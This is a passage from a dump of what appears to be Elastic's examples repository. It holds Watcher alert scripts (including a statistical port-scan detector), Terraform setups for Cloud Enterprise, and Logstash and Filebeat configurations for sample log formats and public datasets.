4 |     "source": "def history=ctx.payload.history_started_processes.aggregations.process_hosts.buckets.stream().map(p -> p.key).collect(Collectors.toList()); def new_starts=ctx.payload.started_processes.aggregations.process_hosts.buckets.stream().map(e -> e.key).filter(p -> !history.contains(p)); return new_starts.map(p -> p.replace('-',' on server ')).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/port_scan/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "source_dest": {
 5 |           "type": "keyword"
 6 |         },
 7 |         "source_dest_port": {
 8 |           "type": "keyword"
 9 |         },
10 |         "port": {
11 |           "type": "integer"
12 |         },
13 |         "@timestamp":{
14 |           "type":"date"
15 |         }
16 |       }
17 |   }
18 | }
19 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/port_scan/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def sensitivity = ctx.metadata.sensitivity; if (ctx.payload.aggregations.source_dest.buckets.size() == 0) return false; return ctx.payload.aggregations.source_dest.buckets.stream().anyMatch(p -> p.port_stats.std_deviation > 0 && (p.series.buckets[p.series.buckets.length-1].num_ports.value > ((sensitivity * p.port_stats.std_deviation)+p.median_ports.values['50.0'])));"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/port_scan/scripts/index_transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def triggered_time = ctx.trigger.triggered_time; def sensitivity = ctx.metadata.sensitivity; return ['_doc':ctx.payload.aggregations.source_dest.buckets.stream().filter(p -> p.port_stats.std_deviation > 0 && (p.series.buckets[p.series.buckets.length-1].num_ports.value > ((sensitivity * p.port_stats.std_deviation)+p.median_ports.values['50.0']))).map(e -> ['@timestamp':triggered_time,'source_dest':e.key,'source':e.key.split('_')[0],'dest':e.key.split('_')[1],'port_count':e.series.buckets[e.series.buckets.length-1].num_ports.value])];"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/port_scan/scripts/log_transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def sensitivity = ctx.metadata.sensitivity; return ctx.payload.aggregations.source_dest.buckets.stream().filter(p -> p.port_stats.std_deviation > 0 && (p.series.buckets[p.series.buckets.length-1].num_ports.value > ((sensitivity * p.port_stats.std_deviation)+p.median_ports.values['50.0']))).map(p -> p.key.replace('_',' to ')).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/requirements.txt:
--------------------------------------------------------------------------------
 1 | cffi==1.11.5
 2 | cryptography==2.2.2
 3 | elasticsearch==6.0.0
 4 | elasticsearch-xpack==6.0.0
 5 | idna==2.1
 6 | lxml==3.6.4
 7 | ndg-httpsclient==0.4.4
 8 | ordereddict==1.1
 9 | protobuf==3.1.0.post1
10 | pyasn1==0.1.9
11 | pycparser==2.14
12 | pyOpenSSL==17.5.0
13 | simplejson==3.8.2
14 | six==1.10.0
15 | urllib3==1.22
16 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/run_all_tests.sh:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env bash
2 | set -o nounset -o pipefail -o errexit
3 | 
4 | ./run_test.sh '**' "${1:-}" "${2:-}" "${3:-}" "${4:-}" "${5:-}"
5 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/system_fails_to_provide_data/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "host": {
 5 |           "type": "keyword"
 6 |         }
 7 |       }
 8 |   }
 9 | }
10 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/system_fails_to_provide_data/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.aggregations.periods.buckets.history.hosts.buckets.size() > ctx.payload.aggregations.periods.buckets.last_period.hosts.buckets.size();"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/system_fails_to_provide_data/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def last_period=ctx.payload.aggregations.periods.buckets.last_period.hosts.buckets.stream().map(e -> e.key).collect(Collectors.toList()); return ctx.payload.aggregations.periods.buckets.history.hosts.buckets.stream().map(e -> e.key).filter(p -> !last_period.contains(p)).collect(Collectors.toList());"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/system_fails_to_provide_data/tests/test1.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "watch_name": "system_fails_to_provide_data",
 3 |   "mapping_file": "./system_fails_to_provide_data/mapping.json",
 4 |   "index": "log",
 5 |   "type": "doc",
 6 |   "match": true,
 7 |   "watch_file": "./system_fails_to_provide_data/watch.json",
 8 |   "scripts":[{"name":"transform","path":"./system_fails_to_provide_data/scripts/transform.json"},{"name":"condition","path":"./system_fails_to_provide_data/scripts/condition.json"}],
 9 |   "events": [
10 |     {
11 |       "offset": -360,
12 |       "host": "serverA"
13 |     },
14 |     {
15 |       "offset": -180,
16 |       "host": "serverA"
17 |     },
18 |     {
19 |       "offset": -360,
20 |       "host": "serverB"
21 |     }
22 |   ],
23 |   "expected_response": "Systems not responding in the last 5m minutes:serverB:"
24 | }
25 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/twitter_trends/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "@timestamp": {
 5 |           "type": "date",
 6 |           "format": "dateOptionalTime"
 7 |         },
 8 |         "text": {
 9 |           "type": "text",
10 |           "fields": {
11 |             "raw": {
12 |               "type": "keyword",
13 |               "ignore_above": 256
14 |             }
15 |           }
16 |         }
17 |       }
18 |   }
19 | }
20 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/twitter_trends/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "return ctx.payload.aggregations.date_buckets.buckets[ctx.payload.aggregations.date_buckets.buckets.length-1].doc_count > (ctx.payload.aggregations.percentiles.values['90.0']+(ctx.payload.aggregations.stats.std_deviation*3));"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/unexpected_account_activity/mapping.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "mappings": {
 3 |       "properties": {
 4 |         "event_type": {
 5 |           "type": "keyword"
 6 |         },
 7 |          "user": {
 8 |           "type": "keyword"
 9 |         },
10 |         "@timestamp":{
11 |           "type":"date"
12 |         }
13 |       }
14 |   }
15 | }
16 | 


--------------------------------------------------------------------------------
/Alerting/Sample Watches/unexpected_account_activity/scripts/condition.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def removes=ctx.payload.aggregations.event_types.buckets.remove.users.buckets.stream().map(p -> p.key).collect(Collectors.toList()); return ctx.payload.aggregations.event_types.buckets.add.users.buckets.stream().map(p -> p.key).filter(p -> removes.contains(p)).toArray().length > 0;"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Alerting/Sample Watches/unexpected_account_activity/scripts/transform.json:
--------------------------------------------------------------------------------
1 | {
2 |   "script": {
3 |     "lang": "painless",
4 |     "source": "def removes=ctx.payload.aggregations.event_types.buckets.remove.users.buckets.stream().map(p -> p.key).collect(Collectors.toList()); return ctx.payload.aggregations.event_types.buckets.add.users.buckets.stream().map(p -> p.key).filter(p -> removes.contains(p)).toArray();"
5 |   }
6 | }


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/aws/terraform/.gitignore:
--------------------------------------------------------------------------------
1 | .terraform
2 | *.tfstate*
3 | terraform.tfvars
4 | bootstrap-secrets.json
5 | 


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/aws/terraform/main.tf:
--------------------------------------------------------------------------------
 1 | terraform {
 2 |   required_version = ">=0.12.0"
 3 | }
 4 | 
 5 | # Initiate ece installation through ansible playbook
 6 | resource "null_resource" "run-ansible" {
 7 |   provisioner "local-exec" {
 8 |     command = data.template_file.ansible-install.rendered
 9 |   }
10 | }
11 | 
12 | output "ece-instances" {
13 |    description = "The public dns of created server instances."
14 |    value = [aws_instance.server.*.public_dns]
15 | }
16 | 
17 | output "ece-ui-url" {
18 |    value = format("https://%s:12443",aws_instance.server.0.public_dns)
19 | }
20 | 
21 | output "ece-api-url" {
22 |    value = format("https://%s:12343",aws_instance.server.0.public_dns)
23 | }
24 | 


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/aws/terraform/provider.tf:
--------------------------------------------------------------------------------
 1 | provider "aws" {
 2 |   region  = var.aws_region
 3 | 
 4 |   # You can use access keys
 5 |   access_key = var.aws_access_key
 6 |   secret_key = var.aws_secret_key
 7 | 
 8 |   # Or specify an aws profile, instead.
 9 |   # profile = "<aws profile>"
10 | }


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/aws/terraform/terraform.tfvars.example:
--------------------------------------------------------------------------------
 1 | ## See variables.tf for descriptions
 2 | 
 3 | project_name = "ece-terraform-example"
 4 | 
 5 | trusted_network = "<your ip>/32"
 6 | 
 7 | ## AWS provider settings
 8 | aws_access_key = "<your key>"
 9 | aws_secret_key = "<your secret>"
10 | #aws_region = "us-east-1"
11 | #public_key = "~/.ssh/id_rsa.pub"
12 | #private_key = "~/.ssh/id_rsa"
13 | 


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/gcp/terraform/.gitignore:
--------------------------------------------------------------------------------
1 | .terraform
2 | *.tfstate*
3 | terraform.tfvars
4 | bootstrap-secrets.json
5 | 


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/gcp/terraform/main.tf:
--------------------------------------------------------------------------------
 1 | resource "null_resource" "run-ansible" {
 2 | 
 3 |   # Makes sure ansible runs after all resources are available
 4 |   depends_on = [google_compute_instance.server,google_compute_disk.disk,google_compute_firewall.administration]
 5 | 
 6 |   provisioner "local-exec" {
 7 |     command = data.template_file.ansible-install.rendered
 8 |   }
 9 | }
10 | 
11 | output "ece-ui-url" {
12 |   value = format("https://%s:12443", google_compute_instance.server[0].network_interface[0].access_config[0].nat_ip)
13 | }
14 | 
15 | output "ece-api-url" {
16 |   value = format("https://%s:12343",google_compute_instance.server[0].network_interface[0].access_config[0].nat_ip)
17 | }
18 | 
19 | output "ece-instances" {
20 |   description = "The public ip of the created server instances."
21 |   value = [google_compute_instance.server[*].network_interface[0].access_config[0].nat_ip]
22 | }


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/gcp/terraform/provider.tf:
--------------------------------------------------------------------------------
1 | provider "google" {
2 |   region      = var.region
3 |   project     = var.project
4 |   credentials = file(format("~/.config/gcloud/%s",var.gcp_key_filename))
5 | }


--------------------------------------------------------------------------------
/Cloud Enterprise/Getting Started Examples/gcp/terraform/terraform.tfvars.example:
--------------------------------------------------------------------------------
1 | # See variables.tf for descriptions
2 | 
3 | project = "YOUR-CLOUD-PROJECT"
4 | 
5 | gcp_key_filename = "key-file-name.json"
6 | 
7 | name = "YOUR-NAME"
8 | 


--------------------------------------------------------------------------------
/Common Data Formats/apache_logs/apache_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/apache_logs/apache_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/apache_logs/logstash/apache_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {  
 2 |   stdin { } 
 3 | }
 4 | 
 5 | 
 6 | filter {
 7 |   grok {
 8 |     match => {
 9 |       "message" => '%{IPORHOST:clientip} %{USER:ident} %{USER:auth} \[%{HTTPDATE:timestamp}\] "%{WORD:verb} %{DATA:request} HTTP/%{NUMBER:httpversion}" %{NUMBER:response:int} (?:-|%{NUMBER:bytes:int}) %{QS:referrer} %{QS:agent}'
10 |     }
11 |   }
12 | 
13 |   date {
14 |     match => [ "timestamp", "dd/MMM/YYYY:HH:mm:ss Z" ]
15 |     locale => en
16 |   }
17 | 
18 |   geoip {
19 |     source => "clientip"
20 |   }
21 | 
22 |   useragent {
23 |     source => "agent"
24 |     target => "useragent"
25 |   }
26 | }
27 | 
28 | output {
29 |   stdout {
30 |     codec => dots {}
31 |   }
32 | 
33 |   elasticsearch {
34 |     index => "apache_elastic_example"
35 |     template => "./apache_template.json"
36 |     template_name => "apache_elastic_example"
37 |     template_overwrite => true
38 |   }
39 | }
40 | 


--------------------------------------------------------------------------------
/Common Data Formats/cef/cef_dashboard.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/cef/cef_dashboard.png


--------------------------------------------------------------------------------
/Common Data Formats/cef/docker-compose.yml:
--------------------------------------------------------------------------------
 1 | version: '2'
 2 | services:
 3 |   kibana:
 4 |     image: docker.elastic.co/kibana/kibana:5.1.1
 5 |     links:
 6 |       - elasticsearch
 7 |     ports:
 8 |       - 5601:5601
 9 | 
10 |   elasticsearch:
11 |     image: docker.elastic.co/elasticsearch/elasticsearch:5.1.1
12 |     cap_add:
13 |       - IPC_LOCK
14 |     volumes:
15 |       - esdata1:/usr/share/elasticsearch/data
16 |     ports:
17 |       - 9200:9200
18 |       
19 |   logstash:
20 |     build: logstash
21 |     links:
22 |       - elasticsearch
23 |     ports:
24 |       - 5000:5000
25 |       - 9600:9600
26 | 
27 | volumes:
28 |   esdata1:
29 |     driver: local
30 |         


--------------------------------------------------------------------------------
/Common Data Formats/cef/logstash/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM docker.elastic.co/logstash/logstash:5.1.1
2 | RUN rm -f /usr/share/logstash/pipeline/logstash.conf
3 | ADD pipeline/logstash.conf /usr/share/logstash/pipeline/logstash.conf
4 | ADD pipeline/cef_template.json /usr/share/logstash/cef_template.json


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_logs/logstash/nginx_json_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   stdin {
 3 |     codec => json
 4 |     }
 5 | }
 6 | 
 7 | filter {
 8 | 
 9 |   date {
10 |     match => ["time", "dd/MMM/YYYY:HH:mm:ss Z" ]
11 |     locale => en
12 |   }
13 | 
14 |   geoip {
15 |     source => "remote_ip"
16 |     target => "geoip"
17 |   }
18 | 
19 |   useragent {
20 |     source => "agent"
21 |     target => "user_agent"
22 |   }
23 | 
24 |   grok {
25 |     match => [ "request" , "%{WORD:request_action} %{DATA:request1} HTTP/%{NUMBER:http_version}" ]
26 |   }
27 | }
28 | 
29 | output {
30 |   stdout  {
31 |     codec => dots {}
32 |   }
33 | 
34 |   elasticsearch {
35 |     index => "nginx_json_elastic_stack_example"
36 |     document_type => "logs"
37 |     template => "./nginx_json_template.json"
38 |     template_name => "nginx_json_elastic_stack_example"
39 |     template_overwrite => true
40 |   }
41 | 
42 | }
43 | 


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_logs/nginx_json_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/nginx_json_logs/nginx_json_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_logs/nginx_json_filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - input_type: log
 3 |   paths:
 4 |     - nginx_json_logs
 5 |   json.keys_under_root: true
 6 |   document_type: logs
 7 | 
 8 | output.elasticsearch:
 9 |   hosts: ["localhost:9200"]
10 |   index: "nginx_json_elastic"
11 |   pipeline: nginx_json_pipeline
12 | 
13 | setup.template.enabled: false


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_plus_logs/logstash/nginxplus_json_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   stdin {
 3 |     codec => json
 4 |     }
 5 | }
 6 | 
 7 | filter {
 8 |   date {
 9 |     match => ["timestamp", "UNIX_MS"]
10 |   }
11 | }
12 | 
13 | output {
14 |   stdout { codec => dots }
15 | 
16 |   elasticsearch {
17 |     index => "nginxplus_json_elastic_stack_example"
18 |     document_type => "logs"
19 |     template => "./nginxplus_json_template.json"
20 |     template_name => "nginxplus_json_elastic_stack_example"
21 |     template_overwrite => true
22 |   }
23 | 
24 | }
25 | 


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_plus_logs/nginx_plus_json_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/nginx_json_plus_logs/nginx_plus_json_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_plus_logs/nginxplus_filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - input_type: log
 3 |   paths:
 4 |     - nginxplus_json_logs
 5 |   json.keys_under_root: true
 6 |   document_type: logs
 7 | 
 8 | output.elasticsearch:
 9 |   hosts: ["localhost:9200"]
10 |   index: "nginxplus_json"
11 |   pipeline: nginxplus_json_pipeline
12 | 
13 | setup.template.enabled: false


--------------------------------------------------------------------------------
/Common Data Formats/nginx_json_plus_logs/nginxplus_json_pipeline.json:
--------------------------------------------------------------------------------
 1 | {
 2 |     "description": "nginx plus json pipeline",
 3 |     "processors": [
 4 |       {
 5 |         "convert": {
 6 |           "field": "timestamp",
 7 |           "type": "string"
 8 |         }
 9 |       },
10 |       {
11 |         "date": {
12 |           "field": "timestamp",
13 |           "formats": [
14 |             "UNIX_MS"
15 |           ],
16 |           "target_field": "@timestamp"
17 |         }
18 |       }
19 |     ]
20 | }


--------------------------------------------------------------------------------
/Common Data Formats/nginx_logs/logstash/nginx_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   stdin { }
 3 | }
 4 | 
 5 | filter {
 6 |   grok {
 7 |     match => {
 8 |       "message" => '%{IPORHOST:remote_ip} - %{DATA:user_name} \[%{HTTPDATE:time}\] "%{WORD:request_action} %{DATA:request} HTTP/%{NUMBER:http_version}" %{NUMBER:response} %{NUMBER:bytes} "%{DATA:referrer}" "%{DATA:agent}"'
 9 |     }
10 |   }
11 | 
12 |   date {
13 |     match => [ "time", "dd/MMM/YYYY:HH:mm:ss Z" ]
14 |     locale => en
15 |   }
16 | 
17 |   geoip {
18 |     source => "remote_ip"
19 |     target => "geoip"
20 |   }
21 | 
22 |   useragent {
23 |     source => "agent"
24 |     target => "user_agent"
25 |   }
26 | }
27 | 
28 | output {
29 | stdout {
30 |  codec => dots {}
31 |  }
32 |   elasticsearch {
33 |     index => "nginx_elastic_stack_example"
34 |     document_type => "logs"
35 |     template => "./nginx_template.json"
36 |     template_name => "nginx_elastic_stack_example"
37 |     template_overwrite => true
38 |   }
39 | }
40 | 


--------------------------------------------------------------------------------
/Common Data Formats/nginx_logs/nginx_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/nginx_logs/nginx_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/twitter/twitter_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Common Data Formats/twitter/twitter_dashboard.jpg


--------------------------------------------------------------------------------
/Common Data Formats/twitter/twitter_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   twitter {
 3 |     consumer_key       => "INSERT YOUR CONSUMER KEY"
 4 |     consumer_secret    => "INSERT YOUR CONSUMER SECRET"
 5 |     oauth_token        => "INSERT YOUR ACCESS TOKEN"
 6 |     oauth_token_secret => "INSERT YOUR ACCESS TOKEN SECRET"
 7 |     keywords           => [ "thor", "spiderman", "wolverine", "ironman", "hulk"]
 8 |     full_tweet         => true
 9 |   }
10 | }
11 | 
12 | filter { }
13 | 
14 | output {
15 |   stdout {
16 |     codec => dots
17 |   }
18 |   elasticsearch {
19 |       hosts => "localhost:9200"
20 |       index         => "twitter_elastic_example"
21 |       document_type => "tweets"
22 |       template      => "./twitter_template.json"
23 |       template_name => "twitter_elastic_example"
24 |       template_overwrite => true
25 |   }
26 | }
27 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/cdc_nutrition_exercise_patterns/kibana_exercise_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/cdc_nutrition_exercise_patterns/kibana_exercise_dashboard.jpg


--------------------------------------------------------------------------------
/Exploring Public Datasets/cdc_nutrition_exercise_patterns/kibana_nutrition_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/cdc_nutrition_exercise_patterns/kibana_nutrition_dashboard.jpg


--------------------------------------------------------------------------------
/Exploring Public Datasets/cdc_nutrition_exercise_patterns/scripts/activity.csv:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/cdc_nutrition_exercise_patterns/scripts/activity.csv


--------------------------------------------------------------------------------
/Exploring Public Datasets/cdc_nutrition_exercise_patterns/scripts/requirements.txt:
--------------------------------------------------------------------------------
1 | elasticsearch==5.4.0
2 | numpy==1.11.2
3 | pandas==0.19.0
4 | python-dateutil==2.5.3
5 | pytz==2016.7
6 | six==1.10.0
7 | urllib3==1.18
8 | xport==0.6.4


--------------------------------------------------------------------------------
/Exploring Public Datasets/donorschoose/donorschoose_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/donorschoose/donorschoose_dashboard.jpg


--------------------------------------------------------------------------------
/Exploring Public Datasets/donorschoose/scripts/requirements.txt:
--------------------------------------------------------------------------------
1 | elasticsearch==5.4.0
2 | numpy==1.11.2
3 | pandas==0.19.0
4 | python-dateutil==2.5.3
5 | pytz==2016.7
6 | six==1.10.0
7 | urllib3==1.22


--------------------------------------------------------------------------------
/Exploring Public Datasets/earthquakes/ncedc-earthquakes-dataset.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/earthquakes/ncedc-earthquakes-dataset.tar.gz


--------------------------------------------------------------------------------
/Exploring Public Datasets/earthquakes/ncedc-earthquakes-filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - type: log
 3 |   fields_under_root: true
 4 |   paths:
 5 |     - ./ncedc-earthquakes-dataset/earthquakes.txt
 6 |   fields:
 7 |     type: earthquake
 8 | 
 9 | - type: log
10 |   fields_under_root: true
11 |   paths:
12 |     - ./ncedc-earthquakes-dataset/blasts.txt
13 |   fields:
14 |     type: blast
15 | 
16 | output.elasticsearch:
17 |   hosts: ["localhost:9200"]
18 |   index: "ncedc-earthquakes"
19 |   pipeline: ncedc-earthquakes
20 |   indices:
21 |     - index: "ncedc-earthquakes-earthquake"
22 |       when.equals:
23 |         type: "earthquake"
24 |     - index: "ncedc-earthquakes-blast"
25 |       when.equals:
26 |         type: "blast"
27 | setup.template.enabled: false


--------------------------------------------------------------------------------
/Exploring Public Datasets/earthquakes/ncedc-earthquakes-screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/earthquakes/ncedc-earthquakes-screenshot.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/against.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/against.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/clean.sh:
--------------------------------------------------------------------------------
 1 | curl -XDELETE localhost:9200/nhl
 2 | curl -XPUT localhost:9200/nhl -d '{
 3 |   "mappings": {
 4 |     "play": {
 5 | 
 6 |         "dynamic_templates": [
 7 |             { "notanalyzed": {
 8 |                   "match":              "*", 
 9 |                   "match_mapping_type": "string",
10 | 	  	  "mapping" : {
11 | 		      "type" : "string", "index" : "analyzed", "omit_norms" : true,
12 | 		      "fields" : {
13 | 			"raw" : {"type": "string", "index" : "not_analyzed"}
14 | 		      }
15 | 		   }
16 |                }
17 |             }
18 |           ]
19 |        }
20 |    }
21 | }'
22 | 
23 | 
24 | 
25 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/game.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/game.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/geo-arena/arena-viz.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/geo-arena/arena-viz.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/geo-arena/arena.tiff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/geo-arena/arena.tiff


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/geo-arena/kibana-settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nhl/geo-arena/kibana-settings.png


--------------------------------------------------------------------------------
/Exploring Public Datasets/nhl/package.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "name": "nhl-stats-elasticsearch",
 3 |   "version": "0.0.1",
 4 |   "scripts": {
 5 |     "go": "node go.js"
 6 |   },
 7 |   "dependencies": {
 8 |     "futures": "*",
 9 |     "request": "*"
10 |   }
11 | }
12 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/nyc_restaurants/restaurants_kibana.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/nyc_restaurants/restaurants_kibana.jpg


--------------------------------------------------------------------------------
/Exploring Public Datasets/nyc_restaurants/scripts/requirements.txt:
--------------------------------------------------------------------------------
 1 | elasticsearch==6.0
 2 | cython==0.26
 3 | geopy==1.11.0
 4 | numpy==1.11.2
 5 | pandas==0.19.0
 6 | python-dateutil==2.5.3
 7 | pytz==2016.7
 8 | six==1.10.0
 9 | urllib3==1.18
10 | certifi==2017.7.27.1
11 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/nyc_traffic_accidents/nyc_collision_filebeat.yml:
--------------------------------------------------------------------------------
 1 | filebeat.prospectors:
 2 | - type: log
 3 |   paths:
 4 |     - ./nyc_collision/nyc_collision_data.csv
 5 | 
 6 | output.elasticsearch:
 7 |   hosts: ["localhost:9200"]
 8 |   index: nyc_visionzero
 9 |   pipeline: nyc_collision
10 | 
11 | setup.template.enabled: false
12 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/usfec/scripts/usfec_logstash.conf:
--------------------------------------------------------------------------------
 1 | input {
 2 |   	stdin {
 3 | 		codec => json_lines {}
 4 | 	}
 5 | }
 6 | 
 7 | filter {
 8 | 	if !([transactionDate] == "")
 9 | 	{
10 | 		date {
11 | 			match => [ "transactionDate", "MMddyyyy", "MM/dd/yyyy"]
12 | 		}
13 | 	}
14 | 	mutate {
15 | 		convert => ["transactionAmount", "float"]
16 | 	}
17 | }
18 | 
19 | output {
20 | 	stdout { codec => dots }
21 | 	elasticsearch {
22 | 		hosts => "localhost:9200"
23 | 		index => "usfec_%{recordType}"
24 | 		template => "usfec_template.json"
25 | 		template_name => "usfec"
26 | 		template_overwrite => true
27 |         user => "elastic"
28 |         password => "changeme"
29 | 	}
30 | }
31 | 


--------------------------------------------------------------------------------
/Exploring Public Datasets/usfec/usfec_dashboard.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/elastic/examples/6d86454ebb7a850bcd7e80abe86fe683370018a6/Exploring Public Datasets/usfec/usfec_dashboard.jpg


--------------------------------------------------------------------------------
/GCP Dataflow to Elasticsearch/.gitignore:
--------------------------------------------------------------------------------
1 | # Ignore any terraform specific folder & hidden files
2 | .terraform*
3 | # Ignore terraform state and vars
4 | terraform.tf*
5 | 


--------------------------------------------------------------------------------
/GCP Dataflow to Elasticsearch/.tool-versions:
--------------------------------------------------------------------------------
1 | terraform 1.0.3
2 | 


--------------------------------------------------------------------------------
/GCP Dataflow to Elasticsearch/README.md:
--------------------------------------------------------------------------------
 1 | # GCP Dataflow to Elasticsearch
 2 | 
 3 | This example allow to setup a GCP Dataflow job to forward GCP Audit logs data to Elasticsearch.
 4 | 
 5 | ## Setup
 6 | 
 7 | Terraform CLI is required for this example.
 8 | 
 9 | Install `GCP` integration in your Elasticsearch cluster (example tested with 1.0.1).  
10 | 
11 | ## Versions
12 | 
13 | Tested with Terraform 1.0.3.
14 | 
15 | Tested with Elastic stack 7.15.0.
16 | 
17 | 
18 | 


--------------------------------------------------------------------------------
/GCP Dataflow to Elasticsearch/main.tf:
--------------------------------------------------------------------------------
 1 | provider "google" {
 2 |   project = var.project_id
 3 |   region  = var.region
 4 | }
 5 | 
 6 | provider "google-beta" {
 7 |   project = var.project_id
 8 |   region  = var.region
 9 | }
10 | 


